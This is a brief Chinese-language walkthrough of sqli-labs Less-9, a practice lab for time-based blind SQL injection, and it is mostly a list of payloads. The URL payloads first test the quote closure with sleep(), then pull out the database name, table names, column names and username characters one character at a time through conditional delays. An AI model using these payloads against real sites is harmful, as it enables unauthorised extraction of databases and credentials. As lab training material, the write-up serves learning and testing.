less-9(时间盲注)
1.前端页面没有任何变化
2.时间盲注判断闭合
?id=1' and sleep(5) -- - #延迟5s
?id=1‘' and sleep(5) -- -
?id=1 and sleep(5) -- -
?id=1‘) and sleep(5) -- -
?id=1‘') and sleep(5) -- -
3.注入逻辑
?id=1' and if((database()='security'),sleep(5),1)-- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
4.爆破数据库名
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
5.爆破表名
?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)-- -
6.爆破字段名
?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(3),1)-- -
7.爆破数值
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=1,sleep(3),1)-- -
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(3),1)-- - #68是大写字母D
版权归原作者 不知名白帽 所有, 如有侵权,请联系我们删除。